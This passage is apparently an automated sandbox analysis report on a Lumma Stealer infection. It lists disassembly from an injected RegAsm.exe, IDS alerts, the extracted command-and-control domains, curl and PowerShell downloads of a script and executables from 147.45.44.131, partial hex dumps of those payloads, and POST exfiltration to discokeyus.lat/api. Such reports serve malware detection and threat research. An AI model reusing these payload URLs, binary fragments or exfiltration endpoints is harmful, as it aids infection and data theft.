              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]8_2_00435450
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]8_2_00417380
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push 00000000h8_2_00429C2B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], dx8_2_004291DD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]8_2_004291DD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]8_2_004074F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]8_2_004074F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h8_2_004385E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax8_2_004385E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]8_2_00417DEE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax8_2_00409580
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ebp+00h], ax8_2_00409580
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp dword ptr [0044450Ch]8_2_00418591
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]8_2_00428D93
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then xor edi, edi8_2_0041759F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]8_2_0041C653
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ebp8_2_00425E70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp dword ptr [004455F4h]8_2_00425E30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax8_2_0043AEC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al8_2_00408F50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], bl8_2_00408F50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]8_2_0042A700
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], al8_2_0041BF14
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]8_2_00419F30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [edx]8_2_004197C2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edi], dx8_2_004197C2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [esi], cx8_2_004197C2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, ebx8_2_0042DFE9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx8_2_0040BFFD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]8_2_0043EFB0

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:60815 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.4:65307 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49739 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49738 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2859377 - Severity 1 - ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) : 192.168.2.4:49733 -> 147.45.44.131:80
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49745 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49740 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49736 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49743 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49741 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49750 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49738 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49743 -> 172.67.197.170:443
              Source: Malware configuration extractorURLs: necklacebudi.lat
              Source: Malware configuration extractorURLs: rapeflowwj.lat
              Source: Malware configuration extractorURLs: sustainskelet.lat
              Source: Malware configuration extractorURLs: aspecteirs.lat
              Source: Malware configuration extractorURLs: energyaffai.lat
              Source: Malware configuration extractorURLs: grannyejh.lat
              Source: Malware configuration extractorURLs: discokeyus.lat
              Source: Malware configuration extractorURLs: crosshuaht.lat
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 06:18:01 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 17 Dec 2024 20:57:01 GMTETag: "b200-6297d89e9c02c"Accept-Ranges: bytesContent-Length: 45568Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 19 bb 4b a7 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 0c 00 00 00 00 00 00 ee c3 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c c3 00 00 4f 00 00 00 00 e0 00 00 18 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 80 c3 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 a3 00 00 00 20 00 00 00 a4 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 08 00 00 00 e0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c3 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 22 00 00 e8 a0 00 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 53 00 00 00 01 00 00 11 28 0f 00 00 0a 72 01 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0a 28 0f 00 00 0a 72 33 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0b 73 12 00 00 0a 25 6f 13 00 00 0a 06 07 6f 14 00 00 0a 7e 01 00 00 04 6f 15 00 00 0a 0c 7e 02 00 00 04 08 28 03 00 00 06 2a 1e 02 28 16 00 00 0a 2a 00 13 30 06 00 df 00 00 00 02 00 00 11 28 0f 00 00 0a 72 0e 01 00 70 28 10 00 00 0a 6f 11 00 00 0a 28 10 00 00 0a 7e 03 00 00 04 28 05 00 00 06 0a 28 0f 00 00 0a 06 6f 11 00 00 0a 0b 73 17 00 00 0a 73 18 00 00 0a 0c 08 6f 19 00 00 0a 28 0f 00 00 0a 72 0b 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 6f 19 00 00 0a 28 0f 00 00 0a 72 2d 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 17 6f 1b 00 00 0a 08 17 8d 19 00 00 01 25 16 07 a2 6f 1c 00 00 0a 6f 1d 00 00 0a 28 0f 00 00 0a 72 57 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1e 00 00 0a 28 0f 00 00 0a 72 71 94 00 70 28 1
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 06:18:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 17 Dec 2024 20:55:22 GMTETag: "49c00-6297d83faa710"Accept-Ranges: bytesContent-Length: 302080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ac 00 00 00 00 00 00 50 88 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 1b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 88 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 1d 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 eb 03 00 00 10 00 00 00 ec 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 97 20 00 00 00 00 04 00 00 22 00 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 e1 00 00 00 30 04 00 00 50 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 88 38 00 00 00 20 05 00 00 3a 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: GET /infopage/knhy.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /infopage/bnkh.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
              Source: Joe Sandbox ViewIP Address: 147.45.44.131 147.45.44.131
              Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 172.67.197.170:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: discokeyus.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=H0SN1JZ0BCB5ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18131Host: discokeyus.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U74AXY2RUBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8734Host: discokeyus.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HOFL2KSKOEIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20393Host: discokeyus.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JC8R6DT9XAQROPUHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1238Host: discokeyus.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LXVLWAQ0XJVMO2E3BHWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 549547Host: discokeyus.lat
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: global trafficHTTP traffic detected: GET /infopage/bhgto.ps1 HTTP/1.1Host: 147.45.44.131User-Agent: curl/7.83.1Accept: */*X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
              Source: global trafficHTTP traffic detected: GET /infopage/knhy.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /infopage/bnkh.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
              Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
              Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
              Source: powershell.exe, 00000005.00000002.1737453939.0000000005013000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1737453939.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1737453939.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131
              Source: curl.exe, 00000004.00000002.1695078378.0000000003310000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1695164199.0000000003488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/bhgto.ps1
              Source: curl.exe, 00000004.00000002.1695164199.0000000003488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/bhgto.ps1#f
              Source: curl.exe, 00000004.00000002.1695164199.0000000003488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/bhgto.ps1?g
              Source: curl.exe, 00000004.00000002.1695164199.0000000003488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/bhgto.ps1MgH
              Source: curl.exe, 00000004.00000002.1695164199.0000000003488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/bhgto.ps1Qf
              Source: powershell.exe, 00000005.00000002.1737453939.00000000051B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/bnkh.exe
              Source: powershell.exe, 00000005.00000002.1737453939.0000000005013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/knhy.exe
              Source: RegAsm.exe, 00000008.00000002.1937052782.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000005.00000002.1737453939.0000000005013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000005.00000002.1737453939.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.1737453939.0000000005013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000005.00000002.1737453939.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: RegAsm.exe, 00000008.00000002.1937957812.000000000375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: powershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: RegAsm.exe, 00000008.00000002.1937475217.0000000001116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/
              Source: RegAsm.exe, 00000008.00000002.1937475217.0000000001116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/B
              Source: RegAsm.exe, 00000008.00000002.1937475217.0000000001116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/S
              Source: RegAsm.exe, 00000008.00000002.1937052782.000000000110B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.1937052782.000000000108B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.1937475217.0000000001116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/api
              Source: RegAsm.exe, 00000008.00000002.1937052782.000000000108B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apiP
